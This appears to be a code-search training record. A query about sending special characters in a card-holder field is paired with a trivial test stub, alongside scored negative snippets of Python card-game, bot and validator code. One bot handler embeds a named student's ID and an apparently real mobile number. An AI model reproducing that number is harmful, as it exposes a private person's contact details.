safety instructions about the badge: \\r\\nThis device was designed and assembled by us and has not been certified by any standards. This means that, despite our efforts, the device might cause unintended damage to whomever operates the device or your surroundings.\\r\\nUse the product with care and responsibly. We are not liable for any damages which can occur while operating/using the device. This was mainly designed to play a supervised CTF.\\r\\nThe device only draws 5v of power, so there is no risk of electrocution. However, do not use a (non standard) USB power outlet with a higher voltage. If device produces abnormal heat or \\'magic smoke\\': remove the power and do not turn on again. We will be happy to send you a replacement.\\r\\nIf a short circuit occurs while running on batteries, the batteries will get hot. So:\\r\\n')\n time.sleep(1)\n update.message.reply_text('DO NOT LEAVE THE DEVICE TURNED ON UNATTENDED')\n time.sleep(1)\n update.message.reply_text('The circuitry is fully exposed and metal pins are sticking out from the device. We strongly recommend not to leave children play with the device unattended.')\n time.sleep(1)\n update.message.reply_text('If you have any questions about safety you can reach out to the team by email or via the TG chat accessible via /joingroup')", "def part(phenny, input):\n # Can only be done in privmsg by an admin\n if input.sender.startswith('#'): return\n if input.admin:\n phenny.write(['PART', input.group(2)])", "def ascii_version_of_hidden_card(*cards):\n\n return join_lines((HIDDEN_CARD, ascii_version_of_card(*cards[1:])))", "def accept_letter(self, key):\n letter = key.text()\n key.setEnabled(False)\n self.keyboard.set_focus('Space')\n return letter.lower()", "def for_description_enter_vlan_for_functional_testing_without_quotes(driver, description):\n driver.find_element_by_xpath('//input[@ix-auto=\"input__Description\"]').clear()\n driver.find_element_by_xpath('//input[@ix-auto=\"input__Description\"]').send_keys(description)", "async def fuckedd (abusehard):\n if not abusehard.text[0].isalpha() and abusehard.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n index = random.randint(0, len(memes.ABUSEHARD_STRING) - 1)\n reply_text = memes.ABUSEHARD_STRING[index]\n await abusehard.edit(reply_text)", "def secure_passphrase(val: str) -> bool:\n if len(val) < 15:\n return False\n if len([v for v in val if v not in string.ascii_letters]) < 5:\n return False\n\n return True", "def __str__(self):\n result = ''\n for c in self._cards:\n result = result + str(c) + '\\n'\n return result", "def __str__(self):\n result = ''\n for c in self._cards:\n result = result + str(c) + '\\n'\n return result", "def testDeckStr(self):\n deckObj = Deck()\n tmpStr = 'As\\n2s\\n3s\\n4s\\n5s\\n6s\\n7s\\n8s\\n9s\\n10s\\nJs\\nQs\\nKs\\n\\\nAc\\n2c\\n3c\\n4c\\n5c\\n6c\\n7c\\n8c\\n9c\\n10c\\nJc\\nQc\\nKc\\nAh\\n\\\n2h\\n3h\\n4h\\n5h\\n6h\\n7h\\n8h\\n9h\\n10h\\nJh\\nQh\\nKh\\n\\\nAd\\n2d\\n3d\\n4d\\n5d\\n6d\\n7d\\n8d\\n9d\\n10d\\nJd\\nQd\\nKd\\n'\n self.assertEquals(tmpStr,str(deckObj))", "def wipe_empty_fields(card):\n cardB = []\n for field in card:\n if isinstance(field, basestring):\n field = field.strip()\n if field == '':\n field = None\n cardB.append(field)\n\n i = 0\n iMax = 0\n while i < len(card):\n if cardB[i] is not None:\n iMax = i\n i += 1\n return cardB[:iMax + 1]", "async def cry(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(random.choice(CRI))", "def prepare_response(response):\n response = clean_string(response)\n response += \"\\nYou: \"\n return response", "def clean_passphrase(self):\n data = self.cleaned_data[\"passphrase\"]\n words = data.split(\" \")\n if len(words) != mnemonic_len:\n raise ValidationError(\n \"Passphrase must have exactly %s words!\" % (mnemonic_len,)\n )\n return data", "async def cards_per_hand(ctx):\n message = NNB.cards_per_hand()\n await ctx.send(message)", "async def iasip_title_card(self, ctx: Context, *, title: str) -> None:\n\n async with ctx.channel.typing():\n if not title.startswith('\"'):\n title = '\"' + title\n\n if not title.endswith('\"'):\n title += '\"'\n\n buffer = await image_utils.title_card_generator(title)\n\n try:\n await ctx.send(file=discord.File(buffer, filename=\"iasip.png\"))\n except discord.HTTPException as e:\n bot_logger.error(f'File Send Failure. {e.status}. {e.text}')\n await ctx.send(f'Could not send image. Details: [Status {e.status} | {e.text}]')\n return", "def characters(self, data):\n pass", "def print_cards(cards):\r\n string = ''\r\n for c in cards:\r\n suit = c[0]\r\n if suit == 1:\r\n suit = \"\\u2665\" # heart\r\n elif suit == 2:\r\n suit = \"\\u2660\" # Spade\r\n elif suit == 3:\r\n suit = \"\\u2666\" # Diamond\r\n else:\r\n suit = \"\\u2663\" # club\r\n\r\n num = c[1]\r\n if num == 11:\r\n num = 'J'\r\n elif num == 12:\r\n num = 'Q'\r\n elif num == 13:\r\n num = 'K'\r\n else:\r\n num = str(num)\r\n\r\n string = string + num + suit + ' '\r\n return string", "async def fuckedd(abusehard):\n if not abusehard.text[0].isalpha() and abusehard.text[0] not in (\n \"/\",\n \"#\",\n \"@\",\n \"!\",\n ):\n index = random.randint(0, len(ABUSEHARD_STRING) - 1)\n reply_text = ABUSEHARD_STRING[index]\n await abusehard.edit(reply_text)", "def gokul(update, context):\n update.message.reply_text(\"\"\"GOKULAKRISHNAN-191MC126\n MOBILE-1234567890\"\"\")", "def DisplaySecretWord(Secret_Word):\n print(\"The Secret Word Is:\")\n Secret_Word_Masked = \"_ \" * len(Secret_Word)\n Secret_Word_Masked_Unspaced = \"-\" * len(Secret_Word)\n print(Secret_Word_Masked)\n \n return [Secret_Word_Masked, Secret_Word_Masked_Unspaced]", "def remove_space(user_inputs):\r\n return user_inputs.replace(\" \", \"\")", "def _cards_to_string(self, cards):\n return repr(self._eval.card2string(map(lambda x: x & 63, cards)))\\\n #.lower().replace(\"h\", u\"\\u2761\").replace(\"s\", u\"\\u2660\").replace(\"c\", u\"\\u2663\").replace(\"d\", u\"\\u2662\")", "def test_escape_semicolon(self):\n card = Card(\n \"mocking\",\n \"ˈmɑkɪŋ\",\n \"Making fun of someone or something in a cruel way; derisive.\",\n \"The ruthless scientist changed from mocking to sad.\",\n )\n\n expected = (\n \"The ruthless scientist changed from <b>mocking</b> to sad.; \"\n '\"<b>mocking /ˈmɑkɪŋ/</b><br> Making fun of someone or '\n 'something in a cruel way; derisive.\"'\n )\n\n self.assertEqual(card.to_anki_txt_format(), expected)", "def validUsername(name):\n if validCard(name):\n return False\n if ',' in name or \"?\" in name or \"=\" in name or \";\" in name or \"/\" in name or \"^\" in name or '\"' in name or '@' in name:\n return False\n if len(name) < 3:\n return False\n if \" \" in name:\n return False\n \n return True", "def chars_to_preserve(\n self,\n sentence: str,\n ) -> str:\n try:\n tokenized = re.findall(self.whitelist, sentence, re.IGNORECASE)\n return \" \".join(tokenized)\n except Exception as error:\n print(\n textwrap.dedent(\n f\"\"\"\n Bad characters range {self.whitelist},\n {error}\n \"\"\"\n )\n )\n raise", "def filtra(rut):\n caracteres = \"1234567890k\"\n rutx = \"\"\n for cambio in rut.lower():\n if cambio in caracteres:\n rutx += cambio\n return rutx", "def bala(update, context):\n update.message.reply_text(\"\"\"BALAKUMAR-191MC110\n MOBILE-8903220635\"\"\")", "def message(self, text):\n for char in text:\n if char == '\\n':\n self.cmd(0xC0) # next line\n else:\n self.cmd(ord(char),True)", "def message(self, text):\n for char in text:\n if char == '\\n':\n self.cmd(0xC0) # next line\n else:\n self.cmd(ord(char),True)", "def message(self, text):\n for char in text:\n if char == '\\n':\n self.cmd(0xC0) # next line\n else:\n self.cmd(ord(char),True)", "def on_sendButton_clicked(self):\n inputTxt = self.input.text()\n inputTxt += os.linesep\n \n if self.passwordCheckBox.isChecked():\n self.errors.insertPlainText(os.linesep)\n self.errors.ensureCursorVisible()\n else:\n self.errors.insertPlainText(inputTxt)\n self.errors.ensureCursorVisible()\n \n self.process.write(strToQByteArray(inputTxt))\n \n self.passwordCheckBox.setChecked(False)\n self.input.clear()", "def sendkey_escape(string):\r\n return re.sub(r'([+^%~{}\\[\\]()])', r'{\\1}', string)", "def strip_other_charcter():\n pass", "def _format_senders_correspondent_53D(self, val):\n account = val.get('ACCOUNT')\n name = val.get('NAME')\n address = val.get('ADDRESS')\n if name and address:\n name = FSwiftWriterUtils.split_text_and_prefix(name, 35)\n address = FSwiftWriterUtils.split_text_and_prefix(address, 35)\n val = FSwiftWriterUtils.allocate_space_for_name_address_without_constraint(name, address)\n if account:\n val = \"/\" + str(account) + \"\\n\" + str(val)\n return val", "def masked_word(self):\n for i in range(0,len(self._word)):\n if self._word[i] == ' ':\n self.new_string.append(' ')\n else:\n self.new_string.append('__ ')\n\n return self.print_new_word(self.new_string)", "def cards():\n if user_loggined():\n user = models.User.query.get(session['user_id'])\n u_cards = user.cards.all()\n prep_cards = []\n for card in u_cards:\n prep_cards.append(card.type + ' **** '+card.cnb[-9:])\n else:\n return redirect(url_for('index'))\n return redirect(url_for('index'))", "def removeSingleChars(self) -> None:\n self.text = re.sub('\\s[^\\n\\s]\\s', ' ', self.text)", "def clean_unnecessary_characters(self, tweet):\n tweet = tweet.lstrip(\"\\\"\").rstrip(\"\\\"\")\n tweet = re.sub(self.compiledAlphanumericRegex, ' ', tweet)\n tweet = tweet.replace('_', ' ')\n return tweet" ]
[ "0.57420164", "0.5617736", "0.55529416", "0.55403346", "0.54575396", "0.53695005", "0.5285843", "0.52102894", "0.51688284", "0.5163198", "0.51460236", "0.5135173", "0.5118663", "0.5107931", "0.50539863", "0.5050567", "0.50373065", "0.5022836", "0.5017234", "0.50094473", "0.4966692", "0.49313834", "0.4908603", "0.48998755", "0.48937395", "0.48881218", "0.48736793", "0.48726258", "0.48630086", "0.4851894", "0.4844652", "0.48367348", "0.483444", "0.48284423", "0.4815701", "0.48138064", "0.48122373", "0.48075613", "0.48046914", "0.48006523", "0.47845176", "0.47804433", "0.4778015", "0.47659323", "0.4765509", "0.47650805", "0.47620532", "0.4757588", "0.47548145", "0.47529116", "0.47491577", "0.47487205", "0.4741987", "0.4736869", "0.47366092", "0.47335646", "0.47330323", "0.47277707", "0.4723897", "0.47231776", "0.47199544", "0.4713009", "0.47091255", "0.47014803", "0.47009417", "0.46888056", "0.4687168", "0.46814144", "0.4680477", "0.46774885", "0.46774885", "0.46670255", "0.46667665", "0.46570525", "0.46492854", "0.46476924", "0.4646421", "0.4646172", "0.46405894", "0.4636169", "0.46309015", "0.46260098", "0.46199018", "0.4615192", "0.4614648", "0.46078297", "0.46074554", "0.46052572", "0.46051314", "0.4605073", "0.45985046", "0.45985046", "0.45985046", "0.45981157", "0.45965803", "0.45947805", "0.45875466", "0.45853993", "0.4584208", "0.45827752", "0.45784456" ]
0.0
-1
Send special characters in CardHolder
def test_33(self): assert 'False' == Api.requestBlock('test-33')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def mecard(name, tel, email):\n return f'MECARD:N:{name};TEL:{tel};EMAIL:{email};'", "def display_content(com,message):\n #message = message.encode('utf-8')\n #message = message.decode('ascii', 'ignore')\n safeMsg = filter(lambda x: x in string.printable, message)\n safeMsg = safeMsg.replace('\\n', ' ')\n print \"ALPHA: \", safeMsg\n try:\n #com = serial.Serial(config.devalpha, 9600, timeout=3)\n #com.close()\n #com.open()\n comstr = config.alpha['display'] + safeMsg + config.alpha['eot']\n com.write(comstr)\n #com.close()\n except serial.SerialException as e:\n logging.warning(\"Serial exception: \"+str(e))", "def propeller_card(card):\n return card.as_html()", "def get21_str(in_dict):\n return \"\"\"BEGIN:VCARD\nVERSION:2.1\nN;ENCODING=QUOTED-PRINTABLE;CHARSET=UTF-8:;%s;;;\nTEL;VOICE;CELL:%s\nEND:VCARD\n\"\"\"%(quopri.encodestring(in_dict[\"name\"]), in_dict[\"tel\"])", "def _hackBotchedCard(self, card, res):\n\t\tmat = re.match(r\"([^\\s=]*)\\s*=\\s*([^/]+)\", card.cardimage)\n\t\tif mat:\n\t\t\tres[mat.group(1)] = mat.group(2).strip()\n\t\telse: # Card beyond recognition, ignore\n\t\t\tpass", "def secret_char(c):\n return \"\\\\raisebox{{0.07ex}}{{{}}}\".format(c)", "def card_html_id(card):\n return f'c{card:02d}'", "def encode(self, text):", "async def charinfo(self, ctx: Context, *, characters: str) -> None:\n match = re.match(r\"<(a?):(\\w+):(\\d+)>\", characters)\n if match:\n embed = Embed(\n title=\"Non-Character Detected\",\n description=\"Only unicode characters can be processed, but a custom Discord emoji \" \"was found. Please remove it and try again.\",\n )\n embed.colour = Color.red()\n await ctx.send(embed=embed)\n return\n\n if len(characters) > 25:\n embed = Embed(title=f\"Too many characters ({len(characters)}/25)\")\n embed.colour = Color.red()\n await ctx.send(embed=embed)\n return\n\n def get_info(char: str) -> Tuple[str, str]:\n digit = f\"{ord(char):x}\"\n if len(digit) <= 4:\n u_code = f\"\\\\u{digit:>04}\"\n else:\n u_code = f\"\\\\U{digit:>08}\"\n url = f\"https://www.compart.com/en/unicode/U+{digit:>04}\"\n name = f\"[{unicodedata.name(char, '')}]({url})\"\n info = f\"`{u_code.ljust(10)}`: {name} - {char}\"\n return info, u_code\n\n charlist, rawlist = zip(*(get_info(c) for c in characters))\n\n embed = Embed(description=\"\\n\".join(charlist))\n embed.set_author(name=\"Character Info\")\n\n if len(characters) > 1:\n embed.add_field(name=\"Raw\", value=f\"`{''.join(rawlist)}`\", inline=False)\n\n await ctx.send(embed=embed)", "def sendkey_escape(string):\r\n return re.sub(r'([+^%~{}\\[\\]()])', r'{\\1}', string)", "def test_specialchar(self):\n form_data = self.form_data('vNzwXpzKJyTshvHsuULn')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def characters(self, data):\n pass", "def _cards_to_string(self, cards):\n return repr(self._eval.card2string(map(lambda x: x & 63, cards)))\\\n #.lower().replace(\"h\", u\"\\u2761\").replace(\"s\", u\"\\u2660\").replace(\"c\", u\"\\u2663\").replace(\"d\", u\"\\u2662\")", "def testCardStr(self):\n cardObj = Card('A','d')\n self.assertEquals('Ad',str(cardObj))", "async def encode(ctx, text: Option(str, \"Text to encode in brainfuck\")):\n encoded = bot.brainfuck.encode(text)\n await send_code(ctx, encoded.code, lang=\"bf\")", "def test_create_material_special_chars(self):\n expected_materials = [\n ['cotton', 'žvýkačky'],\n ['cotton', 'žvýkačky'],\n ['wool', 'žvýkačky'],\n ]\n\n select_listings_to_edit(self.driver)\n d = self.driver\n bp = BulkPage(d)\n\n send_keys(bp.operation_input(), 'žvýkačky')\n click(bp.operation_apply())\n\n material_names = bp.material_names()\n assert material_names == expected_materials\n\n send_keys(bp.operation_input(), 'me@site')\n err = bp.error_baloon()\n assert err == \"Materials can only include spaces, letters, and numbers.\"", "def sendingString(self):\n return ''", "def test_value_special_chars(self):\n raw = [\n 0x48,\n 0x65,\n 0x79,\n 0x21,\n 0x3F,\n 0x24,\n 0x20,\n 0xC4,\n 0xD6,\n 0xDC,\n 0xE4,\n 0xF6,\n 0xFC,\n 0xDF,\n ]\n string = \"Hey!?$ ÄÖÜäöüß\"\n self.assertEqual(DPTString.to_knx(string), raw)\n self.assertEqual(DPTString.from_knx(raw), string)", "async def fivedollar(self, ctx):\n await ctx.message.edit(content=\"[̲̅$̲̅(̲̅5̲̅)̲̅$̲̅]\")", "def card_factory(value: str, base: str, is_hidden: bool = False) -> str:\n if 1 <= len(value) <= 2:\n card = list(base)\n card[13:15] = f\"{value} \" if len(value) == 1 else f\"{value}\"\n card[74:76] = f\" {value}\" if len(value) == 1 else f\"{value}\"\n else:\n raise Exception(\"Invalid value lenght. Must be 1 or 2 charaters\")\n\n return hidden_face if is_hidden else \"\".join(card)", "def escape_character_in_string(self, a, text):\n logging.debug(\"in escape character \" + text)\n #self.just_read_char()\n self.read_char()\n self.produce(STRING, text)", "async def badman(self, ctx):\n await ctx.message.edit(content=\"̿̿ ̿̿ ̿̿ ̿'̿'\\̵͇̿̿\\з= ( ▀ ͜͞ʖ▀) =ε/̵͇̿̿/’̿’̿ ̿ ̿̿ ̿̿ ̿̿\")", "def test_special_characters_business_name(self):\n user = \"chairman\"\n msg = self.business_item_class.create_business(\"Ma@en_deleo\", user, \"soft*%ware\", \"nairo@&\")\n print(msg)\n self.assertEqual(msg, {\"message\":\"Business name should not contain special characters\"})", "def post_key(self):\n # print(self.key)\n #Sending the key to the attacker.\n s.send(bytes(\"K\\n{}\".format(str(self.key,'utf-8')),'utf-8'))", "def __str__(self):\n return self.card_no", "def send_msgs(self, submit_success):\n data = {}\n if submit_success:\n data['title'] = '[%s 同学] 打卡成功!' % (self.info.get('name', self.username))\n data['content'] = '🦄 已为您打卡成功!</br>最终打卡状态: %s</br>打卡时间 %s' \\\n % (self.status, datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n else:\n data['title'] = '[%s 同学] 打卡失败!' % (self.info.get('name', self.username))\n data['content'] = '❌ 打卡失败!请手动打卡~</br>最终打卡状态: %s</br>打卡时间 %s' \\\n % (self.status, datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n for msg_sender in self.msg_senders:\n try:\n status = msg_sender.send(data)\n if status:\n logger.info(\"%s %s send a hit card message to you, hit card status: %s\"\n % (self, msg_sender, self.status))\n else:\n logger.warning(\"%s %s failed to send a hit card message to you, hit card status: %s\"\n % (self, msg_sender, self.status))\n except Exception as e:\n logger.warning(\"%s %s failed to send a hit card message to you, hit card status: %s, Error msg: %s\"\n % (self, msg_sender, self.status, e))\n traceback.print_exc()", "def get_char_echo(self) -> str:\n ...", "def set_card_simple(self, title, content):\n self.response.card.type = 'Simple'\n self.response.card.title = title\n self.response.card.content = content", "def __init__(self, char_name, char_description):\r\n super().__init__(char_name, char_description)\r\n self.gift = None\r\n self.gift_conversation = None", "def sendInstruction(self, instruction):\n # instruction = '!'\n print(f'Sending: {instruction}')\n self.ser.write(instruction.encode(\"ascii\"))\n self.ser.write('\\n'.encode(\"ascii\"))\n\n self.ser.reset_input_buffer()\n\n ser_bytes = self.ser.read(1)\n print(f'Receiving\\nraw data: {ser_bytes}')\n\n # decoded_bytes = (ser_bytes.decode(\"ascii\"))\n # print(f'Ascii Value: {decoded_bytes}', flush=True)", "async def deliver_card(list_of_lists: List[List[str]]) -> str:\n\n final_string = []\n for sublist in list_of_lists:\n final_string.append('\\u200A'.join(sublist))\n\n # add blank emoji to first line to accommodate compact mode w/o resizing emojis\n return '<:blank:589560784485613570>\\n' + '\\n'.join(final_string)", "def wepbuy(self):\n\t\tthismsg = \"\\r\\n\"+self.ESC+\"14C\"+self.ESC+\"1;34m\"+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.ESC+\"0;34m\"+self.A220+self.ESC+\"1m\"+self.A220+self.A220+self.A220+self.A220+self.ESC+\"0;34m\"+self.A220+self.ESC+\"1m\"+self.A220+self.ESC+\"0;34m\"+self.A220+self.A220+self.ESC+\"1m\"+self.A220+self.ESC+\"0;34m\"+self.A220+self.ESC+\"1m\"+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.ESC+\"46m\"+self.A178+self.ESC+\"40m\"+self.A223+self.ESC+\"2C\"+self.ESC+\"37m The\"+self.ESC+\"CSaga\"+self.ESC+\"Cof\"+self.ESC+\"Cthe\"+self.ESC+\"CRed\"+self.ESC+\"CDragon\"+self.ESC+\"C-\"+self.ESC+\"C\"+self.ESC+\"34mWeapons\"+self.ESC+\"CList \"+self.ESC+\"C\"+self.A220+self.ESC+\"46m\"+self.A178+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.ESC+\"46m\"+self.A178+self.ESC+\"44m\"+self.A219+self.ESC+\"40m\"+self.A223+self.A223+self.A223+self.A223+self.ESC+\"0;34m\"+self.A223+self.ESC+\"1m\"+self.A223+self.A223+self.A223+self.ESC+\"0;34m\"+self.A223+self.ESC+\"1m\"+self.A223+self.A223+self.ESC+\"0;34m\"+self.A223+self.ESC+\"1m\"+self.A223+self.ESC+\"0;34m\"+self.A223+self.A223+self.ESC+\"1m\"+self.A223+self.ESC+\"0;34m\"+self.A223+self.ESC+\"1m\"+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.ESC+\"46m\"+self.A178+self.A178+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.ESC+\"46m\"+self.A219+self.ESC+\"2C\"+self.ESC+\"0;36mWeapons\"+self.ESC+\"27CPrice\"+self.ESC+\"7C\"+self.ESC+\"1;34;44m\"+self.A219+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.ESC+\"44m\"+self.A219+self.ESC+\"2C\"+self.ESC+\"40m1.\"+self.ESC+\"CStick\"+self.ESC+\"0;34m..................................\"+self.ESC+\"36m200\"+self.ESC+\"C\"+self.ESC+\"1;34;44m\"+self.A219+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.ESC+\"44m\"+self.A219+self.ESC+\"2C\"+self.ESC+\"40m2.\"+self.ESC+\"CDagger\"+self.ESC+\"0;34m...............................\"+self.ESC+\"36m1,000\"+self.ESC+\"C\"+self.ESC+\"1;34;44m\"+self.A219+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.ESC+\"44m\"+self.A178+self.ESC+\"2C\"+self.ESC+\"40m3.\"+self.ESC+\"CShort\"+self.ESC+\"CSword\"+self.ESC+\"0;34m..........................\"+self.ESC+\"36m3,000\"+self.ESC+\"C\"+self.ESC+\"1;34;44m\"+self.A178+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.ESC+\"44m\"+self.A177+self.ESC+\"2C\"+self.ESC+\"40m4.\"+self.ESC+\"CLong\"+self.ESC+\"CSword\"+self.ESC+\"0;34m..........................\"+self.ESC+\"36m10,000\"+self.ESC+\"C\"+self.ESC+\"1;34;44m\"+self.A177+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.ESC+\"44m\"+self.A176+self.ESC+\"2C\"+self.ESC+\"40m5.\"+self.ESC+\"CHuge\"+self.ESC+\"CAxe\"+self.ESC+\"0;34m............................\"+self.ESC+\"36m30,000\"+self.ESC+\"C\"+self.ESC+\"1;34;44m\"+self.A176+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.ESC+\"0;34m\"+self.A223+self.ESC+\"2C\"+self.ESC+\"1m6.\"+self.ESC+\"CBone\"+self.ESC+\"CCruncher\"+self.ESC+\"0;34m......................\"+self.ESC+\"36m100,000\"+self.ESC+\"C\"+self.ESC+\"34m\"+self.A223+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.A176+self.ESC+\"2C\"+self.ESC+\"1m7.\"+self.ESC+\"CTwin\"+self.ESC+\"CSwords\"+self.ESC+\"0;34m........................\"+self.ESC+\"36m150,000\"+self.ESC+\"C\"+self.ESC+\"34m\"+self.A176+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.A177+self.ESC+\"2C\"+self.ESC+\"1m8.\"+self.ESC+\"CPower\"+self.ESC+\"CAxe\"+self.ESC+\"0;34m..........................\"+self.ESC+\"36m200,000\"+self.ESC+\"C\"+self.ESC+\"34m\"+self.A177+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.A178+self.ESC+\"2C\"+self.ESC+\"1m9.\"+self.ESC+\"CAble's\"+self.ESC+\"CSword\"+self.ESC+\"0;34m.......................\"+self.ESC+\"36m400,000\"+self.ESC+\"C\"+self.ESC+\"34m\"+self.A178+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.A219+self.ESC+\"C\"+self.ESC+\"1m10.\"+self.ESC+\"CWan's\"+self.ESC+\"CWeapon\"+self.ESC+\"0;34m.....................\"+self.ESC+\"36m1,000,000\"+self.ESC+\"C\"+self.ESC+\"34m\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.A223+self.ESC+\"C\"+self.ESC+\"1m11.\"+self.ESC+\"CSpear\"+self.ESC+\"COf\"+self.ESC+\"CGold\"+self.ESC+\"0;34m....................\"+self.ESC+\"36m4,000,000\"+self.ESC+\"C\"+self.ESC+\"34m\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.A219+self.ESC+\"C\"+self.ESC+\"1m12.\"+self.ESC+\"CCrystal\"+self.ESC+\"CShard\"+self.ESC+\"0;34m...................\"+self.ESC+\"36m10,000,000\"+self.ESC+\"C\"+self.ESC+\"34m\"+self.A220+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.A219+self.ESC+\"C\"+self.ESC+\"1m13.\"+self.ESC+\"CNiras's\"+self.ESC+\"CTeeth\"+self.ESC+\"0;34m...................\"+self.ESC+\"36m40,000,000\"+self.ESC+\"C\"+self.ESC+\"34m\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.A219+self.ESC+\"C\"+self.ESC+\"1m14.\"+self.ESC+\"CBlood\"+self.ESC+\"CSword\"+self.ESC+\"0;34m....................\"+self.ESC+\"36m100,000,000\"+self.ESC+\"C\"+self.ESC+\"34m\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.A219+self.ESC+\"C\"+self.ESC+\"1m15.\"+self.ESC+\"CDeath\"+self.ESC+\"CSword\"+self.ESC+\"0;34m....................\"+self.ESC+\"36m400,000,000\"+self.ESC+\"C\"+self.ESC+\"1;34;44m\"+self.A176+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"14C\"+self.ESC+\"44m\"+self.A176+self.ESC+\"0;34m\"+self.A219+self.A220+self.A220+self.A220+self.A220+self.A220+self.A178+self.ESC+\"C\"+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A178+self.ESC+\"C\"+self.A220+self.A220+self.A220+self.ESC+\"C\"+self.A220+self.A220+self.ESC+\"C\"+self.A220+self.A176+self.ESC+\"C\"+self.A220+self.ESC+\"C\"+self.A220+self.A220+self.A220+self.A220+self.A178+self.A220+self.A220+self.A220+self.A220+self.A176+self.A220+self.A220+self.A219+self.ESC+\"1;44m\"+self.A176+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"0m\\r\\n\";\n\t\treturn thismsg", "def send_text(self, data: str) -> None:", "def card_string(card):\n article = \"\"\n if card.face == 'Ace':\n article = \"an \"\n elif card.face in ['Jack', 'Queen', 'King']:\n article = \"a \"\n return article + card.face + \" of \" + card.suit", "def deal_card(self, player: BaseBlackjackPlayer, is_open: bool = True) -> str:\n card = self.deck.pick_card(discard=True, is_open=is_open)\n player.hand.cards.append(card)\n return f\"\\n{player.username} received {card}. Total is: {player.hand.value}\"", "async def charinfo(self, ctx: Context, *, characters: str) -> None:\n match = re.match(r\"<(a?):(\\w+):(\\d+)>\", characters)\n if match:\n await messages.send_denial(\n ctx,\n \"**Non-Character Detected**\\n\"\n \"Only unicode characters can be processed, but a custom Discord emoji \"\n \"was found. Please remove it and try again.\"\n )\n return\n\n if len(characters) > 50:\n await messages.send_denial(ctx, f\"Too many characters ({len(characters)}/50)\")\n return\n\n def get_info(char: str) -> tuple[str, str]:\n digit = f\"{ord(char):x}\"\n if len(digit) <= 4:\n u_code = f\"\\\\u{digit:>04}\"\n else:\n u_code = f\"\\\\U{digit:>08}\"\n url = f\"https://www.compart.com/en/unicode/U+{digit:>04}\"\n name = f\"[{unicodedata.name(char, '')}]({url})\"\n info = f\"`{u_code.ljust(10)}`: {name} - {utils.escape_markdown(char)}\"\n return info, u_code\n\n char_list, raw_list = zip(*(get_info(c) for c in characters), strict=True)\n embed = Embed().set_author(name=\"Character Info\")\n\n if len(characters) > 1:\n # Maximum length possible is 502 out of 1024, so there's no need to truncate.\n embed.add_field(name=\"Full Raw Text\", value=f\"`{''.join(raw_list)}`\", inline=False)\n\n await LinePaginator.paginate(char_list, ctx, embed, max_lines=10, max_size=2000, empty=False)", "def get_card_str(self, card):\n card_str = str(card)\n if card == 11:\n card_str = \"Jack\"\n if card == 12:\n card_str = \"Queen\"\n if card == 13:\n card_str = \"King\"\n if card == 1:\n card_str = \"Ace\"\n \n return card_str", "def produce_message_for_sending() -> str:\n return f\"You can donate your money here:\\n`{card_donations}`\"", "def on_text(self, char: str, game: type):", "def sendChars(self, chars):\n\t\tinputs = []\n\t\tfor ch in chars:\n\t\t\tfor direction in (0,winUser.KEYEVENTF_KEYUP): \n\t\t\t\tinput = winUser.Input()\n\t\t\t\tinput.type = winUser.INPUT_KEYBOARD\n\t\t\t\tinput.ii.ki = winUser.KeyBdInput()\n\t\t\t\tinput.ii.ki.wScan = ord(ch)\n\t\t\t\tinput.ii.ki.dwFlags = winUser.KEYEVENTF_UNICODE|direction\n\t\t\t\tinputs.append(input)\n\t\twinUser.SendInput(inputs)", "def translate_deckbox_card_name(card_name: str) -> str:\n card_name = re.sub(r' \\(.*', '', card_name)\n card_name = re.sub(r'Æ', 'Ae', card_name)\n card_name = re.sub(r'Lim-Dûl\\'s Vault', 'Lim-Dul\\'s Vault', card_name)\n return card_name", "def print_cards(cards):\r\n string = ''\r\n for c in cards:\r\n suit = c[0]\r\n if suit == 1:\r\n suit = \"\\u2665\" # heart\r\n elif suit == 2:\r\n suit = \"\\u2660\" # Spade\r\n elif suit == 3:\r\n suit = 